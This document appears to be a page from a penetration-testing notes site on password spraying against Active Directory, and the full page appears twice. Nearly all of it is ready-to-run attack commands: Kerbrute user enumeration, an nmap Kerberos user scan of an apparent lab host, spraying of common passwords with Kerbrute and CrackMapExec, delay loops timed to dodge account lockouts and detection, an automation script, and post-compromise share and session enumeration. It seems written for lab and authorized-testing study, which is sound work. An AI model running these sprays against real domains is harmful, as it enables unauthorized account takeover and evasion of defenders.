5.Password Spraying Overview

1. User Enumeration with Kerbrute

# Using a predefined username list
kerbrute userenum --dc <domain-controller> -d <domain> usernames.txt

# Using a generated username list (GUIDs example)
for x in {{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}; do echo $x; done > usernames.txt

nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=frizz.htb 10.10.11.60

2. Password Spraying with Kerbrute

kerbrute passwordspray --dc <domain-controller> -d <domain> -U usernames.txt -p <common-password>

3. Password Spraying with CrackMapExec (CME)

cme smb <target-ip> -u usernames.txt -p <password> --no-bruteforce

4. Obtaining Password Policy (if internal access is available)

net accounts
Get-ADDefaultDomainPasswordPolicy

5. Delay Consideration Between Sprays (Bash Example)

for password in Welcome1 Passw0rd Winter2022; do
    cme smb <target-ip> -u usernames.txt -p $password --no-bruteforce
    sleep 1800  # Wait 30 minutes to avoid account lockouts
done

6. Handling Large User Lists (Bash Example)

split -l 1000 usernames.txt user_chunk_
for file in user_chunk_*; do
    kerbrute passwordspray --dc <domain-controller> -d <domain> -U $file -p <password>
    sleep 1800
done

7. Post-Spray Enumeration

cme smb <target-ip> -u <username> -p <password> --shares
cme smb <target-ip> -u <username> -p <password> --sessions

8. Automation (Basic Script)

#!/bin/bash
PASSWORDS=(Welcome1 Passw0rd Winter2022)
for password in "${PASSWORDS[@]}"; do
    kerbrute passwordspray --dc <domain-controller> -d <domain> -U usernames.txt -p $password
    sleep 1800
done

Notes:

- Adjust delay times based on password policy.

- Always confirm the password policy before attempting spraying.

- Use minimal attempts to avoid detection and lockouts.

Previous3.Sighting In, Hunting For A User Next6.Enumerating & Retrieving Password Policies

Last updated 12 days ago

5.Password Spraying Overview

1. User Enumeration with Kerbrute

# Using a predefined username list
kerbrute userenum --dc <domain-controller> -d <domain> usernames.txt

# Using a generated username list (GUIDs example)
for x in {{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}; do echo $x; done > usernames.txt

nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=frizz.htb 10.10.11.60

2. Password Spraying with Kerbrute

kerbrute passwordspray --dc <domain-controller> -d <domain> -U usernames.txt -p <common-password>

3. Password Spraying with CrackMapExec (CME)

cme smb <target-ip> -u usernames.txt -p <password> --no-bruteforce

4. Obtaining Password Policy (if internal access is available)

net accounts
Get-ADDefaultDomainPasswordPolicy

5. Delay Consideration Between Sprays (Bash Example)

for password in Welcome1 Passw0rd Winter2022; do
    cme smb <target-ip> -u usernames.txt -p $password --no-bruteforce
    sleep 1800  # Wait 30 minutes to avoid account lockouts
done

6. Handling Large User Lists (Bash Example)

split -l 1000 usernames.txt user_chunk_
for file in user_chunk_*; do
    kerbrute passwordspray --dc <domain-controller> -d <domain> -U $file -p <password>
    sleep 1800
done

7. Post-Spray Enumeration

cme smb <target-ip> -u <username> -p <password> --shares
cme smb <target-ip> -u <username> -p <password> --sessions

8. Automation (Basic Script)

#!/bin/bash
PASSWORDS=(Welcome1 Passw0rd Winter2022)
for password in "${PASSWORDS[@]}"; do
    kerbrute passwordspray --dc <domain-controller> -d <domain> -U usernames.txt -p $password
    sleep 1800
done

Notes:

- Adjust delay times based on password policy.

- Always confirm the password policy before attempting spraying.

- Use minimal attempts to avoid detection and lockouts.

Previous3.Sighting In, Hunting For A User Next6.Enumerating & Retrieving Password Policies

Last updated 12 days ago